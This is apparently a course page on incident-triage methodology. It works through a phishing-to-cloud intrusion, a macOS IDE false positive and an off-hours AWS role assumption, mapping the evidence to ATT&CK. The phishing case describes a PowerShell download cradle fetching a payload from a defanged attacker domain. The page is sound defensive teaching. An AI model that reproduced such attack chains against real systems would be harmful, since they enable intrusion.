Uncover working example

Working example

Pulling the evidence on the finance-team intrusion

Scope set the boundary: phishing-driven intrusion, 72-hour primary window with a 4-week look at primary entities, three primary identities, three secondary identities, PCI and GDPR active. Uncover begins.

Step 1. Endpoint telemetry

EDR for laptop-finance-09 over the 72-hour window. The Outlook → cmd → PowerShell chain is confirmed. The encoded command decodes to a download cradle pulling a second-stage payload from invoice-records[.]com/upd. The dropped file lives at %TEMP%\upd.ps1 with SHA-256 captured. No prior PowerShell from this user account; baseline confirms abnormality.

Mapped to ATT&CK: T1566 (Phishing) → T1059.001 (PowerShell) → T1105 (Ingress Tool Transfer).

Step 2. Network correlation

Proxy logs confirm the HTTPS connection to invoice-records[.]com. DNS history shows the domain registered 4 days ago, low prevalence, no prior queries from the environment. Firewall logs show outbound TLS at 09:11:43, exactly correlated with the PowerShell PID. Self-signed certificate with generic CN. The destination IP is in a hosting provider’s bulletproof range.

Mapped to ATT&CK: T1071.001 (Application Layer Protocol: Web).

Step 3. Identity logs

dlin’s authentication history over the window: normal corporate-network logins, no anomalous geographies, no MFA bypass. However: a second authentication path appears in cloud identity logs about 12 minutes after the alert. The session was federated from the on-premises identity, still using dlin’s credentials. Targeted the cloud finance platform. Successful.

Mapped to ATT&CK: T1078.004 (Valid Accounts: Cloud Accounts).

Step 4. Mail and SaaS

Mailbox audit confirms the originating email: vendor-themed subject, attachment that decoded to a macro-laden Word document. Three other recipients in the finance team received the same email; two opened it. EDR on those two hosts is queried; one shows the same Outlook → cmd → PowerShell chain. Cloud finance platform logs (vendor-provided, requested during Scope) show no in-app activity beyond the federated login.

Mapped to ATT&CK: T1566.001 (Spearphishing Attachment).

Step 5. Map to ATT&CK and finalize the narrative

The complete chain:

T1566.001  Spearphishing attachment delivered to 4 finance team users
T1204.002  <DefineTerm term="User" /> <DefineTerm term="Execution" display="execution" />: 2 users opened the document
T1059.001  <DefineTerm term="PowerShell" /> execution invoked from macro
T1105      Ingress tool transfer: second-stage payload pulled from external <DefineTerm term="Domain" display="domain" />
T1071.001  Outbound HTTPS to attacker-controlled domain
T1078.004  Valid accounts: federated login to cloud finance platform

Two confirmed compromises (the original alert host plus one peer). No evidence of in-app activity yet on the cloud platform, but the federated login is the lateral-movement signal. Uncover ends with this narrative ready for the Risk phase.

Step 1 of 5

A second scenario: confirming a false-positive on the developer workstation

The first walkthrough showed Uncover building a positive narrative: this is the chain, here are the techniques, here is what to do next. Real triage often runs the other direction. The hypothesis is “compromise”; the evidence has to either confirm it or rule it out with explicit confidence. The methodology demands the same rigor on both paths.

Working example

Pulling the evidence on the Cursor IDE alert

Scope handed off a narrow boundary: macOS developer workstation, frontend engineer, alert minus 1 hour through alert plus 4 hours, EDR primary, the Cursor IDE / Cursor Helper alert that looked like Empire but came from a signed vendor binary. Uncover begins.

Step 1. Endpoint telemetry

EDR data from CrowdStrike, scoped to the time window.

  • 14:03 UTC. User launched Cursor IDE.
  • 14:03–14:04 UTC. ripgrep search for a test string involving a reCAPTCHA token. Consistent with active code work.
  • 14:04–14:07 UTC. Multiple git commands: fetch repository content, access to test files in BlockerEmailVerification and BlockerPhoneVerification modules.
  • 14:08 UTC. JavaScript test runner configuration, relevant test files loaded.
  • 14:08+ UTC. Additional git fetch operations tied to a specific Pull Request. Local branch checked out to feat-migrate-phone-verification-to-flow.

This sequence is a textbook developer workflow on a feature migration. Process tree, command lines, file access all align with the user’s documented role.

Mapped to ATT&CK: nothing in this sequence maps to an attack technique. Worth recording explicitly so the handoff says “behavior is consistent with role” rather than leaving the question open.

Step 2. Network and tooling analysis

Network telemetry over the same window.

  • Outbound destinations. Legitimate corporate version-control hosts, internal development services, collaboration tools. All previously seen, all expected for the role.
  • Traffic volume and frequency. Consistent with normal development. No unusual transfer volume, no beaconing pattern, no periodic callbacks.
  • Protocols and ports. Standard ports for the observed services. No protocol tunneling, no port mismatch indicative of evasion.
  • DNS queries. Internal development domains and trusted external services. No DGA-like entropy, no resolutions to known-malicious domains.

The network picture matches the endpoint picture. Nothing here suggests the binary’s TLS-encrypted outbound calls (the original signal that mapped to Empire patterns) were to anything other than the IDE’s documented vendor infrastructure.

Step 3. Tooling coverage gaps

Uncover does not just report what it found. It reports what it could not see.

  • CrowdStrike on macOS: active, capturing process execution, file access, network traffic. Primary source, working as expected.
  • Native full-packet capture: not available on this macOS configuration. Payload-level inspection of encrypted traffic is therefore not possible from the host’s perspective.
  • USB device monitoring: absent. Cannot conclusively rule out offline data movement.
  • Persistence mechanisms (LaunchAgents, LaunchDaemons): reviewed via EDR file activity. No new entries during the window.
What the gaps mean for the verdict

Uncover’s job at this step is to be explicit about confidence. The two gaps (full PCAP and USB) mean certain attack vectors cannot be fully ruled out from Telemetry Collection and transmission of security-relevant data from remote sources for monitoring and analysis. alone.

However, no other evidence in the available sources supports expanding scope to chase those vectors. The methodology calls this out as “no positive evidence supports expansion at this time, gaps documented, will revisit if new signals surface” rather than pretending the gaps do not exist or panic-expanding the investigation because of them.

Step 4. Behavioral correlation against the role baseline

Subject’s analysis already established this user’s baseline as consistent with the activity. Uncover validates that claim with the deeper telemetry.

  • Peer comparison. Three other engineers on the same team show similar Cursor process trees and network patterns over the past 30 days. The behavior is not unique to this user.
  • Historical workflow. The user’s last 14 days show consistent IDE usage, regular git activity, and the same outbound destinations. The 14:03 sequence is part of a continuous workflow, not a sudden anomaly.
  • No persistence created. No new launchd plists, no new login items, no new scheduled tasks. The binary did not attempt to anchor itself to the system.
  • No credential access. Keychain access logs show no unusual reads. No new SSH keys, no API token grabs.

Four corroborating sources (peer baseline, individual history, persistence absence, credential absence) all agree with the role-consistent reading.

Step 5. Verdict and handoff

Uncover ends with a structured, defensible verdict.

  • Verdict: false-positive with explicit caveats. The detection logic correctly flagged a process behavior pattern that overlaps with Empire tradecraft, but the full investigation shows the behavior is consistent with a signed, role-appropriate IDE running in its documented configuration.
  • Confidence: high on the binary identity, network destinations, and user behavior. Medium on full coverage due to the macOS PCAP and USB monitoring gaps; mitigated by absence of corroborating signals.
  • ATT&CK chain: none. No techniques observed beyond legitimate development activity.
  • Detection feedback: the rule that fired is too broad for macOS developer workstations running Electron-based IDEs. A tuned variant that incorporates binary signature, install path, and runtime context would have suppressed this alert. Feature request opened.
  • Open question for Risk: are the documented coverage gaps (macOS PCAP, USB) acceptable given the developer-workstation population’s risk profile, or do they warrant additional tooling investment? That is a Risk-phase question, not an Uncover-phase one.
What this Uncover deliverable proves

A False-Positive (definition missing) verdict that meets the methodology’s standard is not “dismissed.” It is documented, evidenced, and bounded. The case has:

  • Defensible scope (Scope’s boundary)
  • Defensible subject reads (Subject’s per- Entity A person, system, or organization that interacts with or affects a security incident. assessments)
  • Defensible Uncover evidence (this page’s telemetry, with explicit gaps named)
  • A detection-engineering Feedback Loop A process where information from outcomes is used to improve future detection or response. (the over-broad rule)
  • A teed-up Risk question (acceptable coverage gaps?)

That is what a fully written false-positive looks like. The investigation can be re-opened with full context if new signals appear. Without this kind of write-up, the same alert will fire again next week and the analyst will start from zero.

Step 1 of 5

A cloud-native mini-example: the IAM role assumption

The two cases above are endpoint-anchored. The same methodology works for cloud-origin alerts where the endpoint is irrelevant, what matters is the API call, the principal, and the role chain. This shorter walkthrough shows how Uncover applies to a 2026-typical cloud alert.

Working example

An unexpected AssumeRole in AWS at 02:14 UTC

GuardDuty fires: a long-tenure IAM user invokes sts:AssumeRole to take a role that is normally used only by a CI pipeline. The role grants S3 read on a regulated-data bucket. The user is a senior data engineer; the time is 02:14 UTC, outside their usual window. Subject and Scope set narrow bounds (this user, this role, this bucket, alert minus 1 hour through alert plus 4). Uncover begins.

Step 1. CloudTrail correlation

Pull the user’s CloudTrail events over the time window plus 7 days of baseline.

  • 02:13:58 UTC. sts:GetCallerIdentity from the user. Source IP resolves to a corporate VPN egress.
  • 02:14:02 UTC. sts:AssumeRole for arn:aws:iam::<account>:role/ci-data-export, session name local-investigation-2026-05-12.
  • 02:14–02:31 UTC. Eight s3:GetObject calls against regulated-pii-bucket, all against keys matching quarterly-export/*.
  • Baseline check. The user has assumed other roles regularly, but not ci-data-export. The role is technically grantable to anyone in the data-engineers group; it’s just rarely used outside CI.

Mapped to ATT&CK: T1078.004 Valid Accounts: Cloud Accounts + T1530 Data from Cloud Storage.

Step 2. IdP context

The role-assumption is gated by SSO. Pull the IdP authentication that preceded it.

  • SSO login at 02:13:14 UTC, FIDO2 second factor satisfied, registered device matches the user’s laptop.
  • No impossible travel signal, same geographic region as their typical sign-in.
  • No OAuth consent grant events in the prior 14 days; no new app authorizations.
  • No token-replay indicators: the AWS API calls use credentials minted by this fresh STS session, not a long-lived access key.

The identity surface reads clean. The attacker patterns that would explain “unexpected role assumption”, token theft, consent abuse, AiTM phishing, all show no corroborating evidence.

Step 3. Bucket access pattern

The actions taken inside the assumed role’s session are what determine whether this matters.

  • Eight objects read. All from quarterly-export/. No s3:ListBucket reconnaissance. No traversal into other prefixes.
  • No write, no delete. No new objects created. No s3:DeleteObject. No bucket-policy or ACL changes.
  • Egress check. The session’s source IP is the same corporate VPN throughout. No anomalous data-transfer destination.
  • Object size. Total ~120 MB across the eight keys, consistent with quarterly export files; not a bulk-exfil signature.

Step 4. Verdict and gaps

The hypothesis going in was “unexpected role use on regulated data.” The evidence supports a more boring read:

  • Likely verdict: off-hours manual export by the engineer (confirmed via Slack DM after the on-shift IR opened a quick check). Consistent with quarterly-export work that normally runs in the CI pipeline.
  • Confidence: high on the technical evidence. Medium until the user confirms (which they did, ~15 min into Uncover).
  • Coverage gaps: the S3 data-events trail is on for regulated-pii-bucket; it would NOT be on for buckets without explicit data-event logging. This is a detection-engineering note, not a blocker for this case.
  • Detection-tuning suggestion: add an “automation-only” tag to roles like ci-data-export so manual assumption fires a lower-noise informational signal instead of GuardDuty’s high-severity alert. Feeds the false-positive-into-feedback loop.

This is what Uncover looks like when the case is cloud-anchored: same methodology, different sources (CloudTrail, IdP logs, S3 data events), same standard of evidence.

Step 1 of 4

Next up

Uncover quiz

Take the quiz